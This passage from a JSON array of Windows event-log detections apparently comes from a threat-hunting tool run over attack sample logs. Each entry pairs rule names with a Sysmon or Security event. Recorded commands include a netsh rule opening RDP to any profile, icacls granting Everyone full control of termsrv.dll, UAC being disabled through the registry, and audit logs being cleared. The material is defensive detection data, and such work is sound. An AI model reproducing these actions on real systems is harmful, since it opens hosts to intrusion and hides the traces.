cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":772605,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":5816}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-23T16:49:41.578692Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"3B","SubjectLogonId":"0x7b186","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-500"}}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-27 
10:15:20.376","Image":"c:\\Users\\bouss\\Downloads\\ProcessHerpaderping.exe","ProcessGuid":"00247C92-F3AE-5F97-0000-00106ABA0418","ProcessId":21756,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\samir.exe","UtcTime":"2020-10-27 10:17:18.369"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2246491,"Execution":{"#attributes":{"ProcessID":5400,"ThreadID":6548}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-27T10:17:18.369342Z"}},"Version":2}}}},{"detection":["In-memory PowerShell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"System.Management.Automation","FileVersion":"6.1.7601.17514","Hashes":"SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000","Image":"C:\\Windows\\System32\\notepad.exe","ImageLoaded":"C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4b93b6bd71723bed2fa9dd778436dd5e\\System.Management.Automation.ni.dll","ProcessGuid":"365ABB72-3D1B-5CE0-0000-0010C3840B00","ProcessId":2840,"Product":"Microsoft (R) Windows (R) Operating System","RuleName":"Defense Evasion - Unmanaged PowerShell Detected","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-05-18 
17:16:18.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":18732,"Execution":{"#attributes":{"ProcessID":1940,"ThreadID":2004}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-18T17:16:18.833171Z"}},"Version":3}}}},{"detection":["(Built-in Logic) - New User Created"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107103","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769629,"Execution":{"#attributes":{"ProcessID":584,"ThreadID":752}},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider":{"#attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"}},"Security":null,"Task":13824,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-16T09:31:19.133272Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - New User 
Created"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107104","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769634,"Execution":{"#attributes":{"ProcessID":584,"ThreadID":640}},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider":{"#attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"}},"Security":null,"Task":13824,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-16T09:32:13.647155Z"}},"Version":0}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.526","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\install.bat","UtcTime":"2019-03-17 
20:17:44.526"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5252,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:44.537011Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.607","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPCheck.exe","UtcTime":"2019-03-17 20:17:44.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5253,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:44.637155Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 
20:17:44.777","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPConf.exe","UtcTime":"2019-03-17 20:17:44.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5254,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:44.797385Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.458","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPWInst.exe","UtcTime":"2019-03-17 20:17:45.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5255,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:45.478364Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET 
Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.618","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\uninstall.bat","UtcTime":"2019-03-17 20:17:45.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5256,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:45.628580Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.648","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\update.bat","UtcTime":"2019-03-17 
20:17:45.648"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5257,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:17:45.648609Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware","RDP Sensitive Settings Changed"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"%%ProgramFiles%%\\RDP Wrapper\\rdpwrap.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\ServiceDll","UtcTime":"2019-03-17 20:18:05.086"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5265,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:18:05.086560Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware","RDP Registry Modification","RDP Sensitive Settings Changed"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD 
(0x00000000)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5267,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5269,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"}},"Version":2}}}},{"detection":["Netsh Port or Application Allowed","Netsh RDP Port 
Opening"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in protocol=tcp localport=3389 profile=any action=allow","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=784A50A6A09C25F011C3143DDD68E729,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst\" -i -o","ParentImage":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ParentProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ParentProcessId":3700,"ProcessGuid":"365ABB72-AB81-5C8E-0000-001024960C00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5270,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:18:09.312636Z"}},"Version":5}}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant %%username%%:F","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010296C0D00","ProcessId":3536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.897"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5312,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:20:17.917561Z"}},"Version":5}}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant *S-1-1-0:(F)","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010656E0D00","ProcessId":3652,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5313,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:20:17.927576Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000050)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"365ABB72-AC79-5C8E-0000-0010E1B50D00","ProcessId":2872,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber","UtcTime":"2019-03-17 
20:22:59.399"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5329,"Execution":{"#attributes":{"ProcessID":1852,"ThreadID":464}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T20:22:59.399761Z"}},"Version":2}}}},{"detection":["(Built-in Logic) - System log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"System","Computer":"PC01.example.corp","Correlation":null,"EventID":104,"EventRecordID":27736,"Execution":{"#attributes":{"ProcessID":812,"ThreadID":3916}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":{"#attributes":{"UserID":"S-1-5-21-1587066498-1489273250-1035260531-1106"}},"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T23:34:25.894341Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"BackupPath":"","Channel":"System","SubjectDomainName":"EXAMPLE","SubjectUserName":"user01"}}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-30 
10:12:45.583","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-1EFA-5CC8-0000-0010D3DE1C00","ProcessId":3292,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\bs.ps1","UtcTime":"2019-04-30 10:12:45.583"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":8930,"Execution":{"#attributes":{"ProcessID":1956,"ThreadID":1636}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T10:12:45.583363Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"DFAE8213-70EB-5CDD-0000-0010F66D0A00","ProcessId":3788,"RuleName":"technique_id=T1088,technique_name=Bypass User Account Control","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\EnableLUA","UtcTime":"2019-05-16 14:17:15.758"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":13,"EventRecordID":18619,"Execution":{"#attributes":{"ProcessID":1780,"ThreadID":2204}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-16T14:17:15.763712Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Office Security Settings 
Changed"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","ProcessGuid":"365ABB72-92DF-5CDB-0000-0010A15E1300","ProcessId":3804,"RuleName":"Defense Evasion - access to the VBA project object model in the Macro Settings changed","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\AccessVBOM","UtcTime":"2019-05-15 04:18:40.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":17915,"Execution":{"#attributes":{"ProcessID":2024,"ThreadID":1212}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-15T04:18:40.474644Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-17 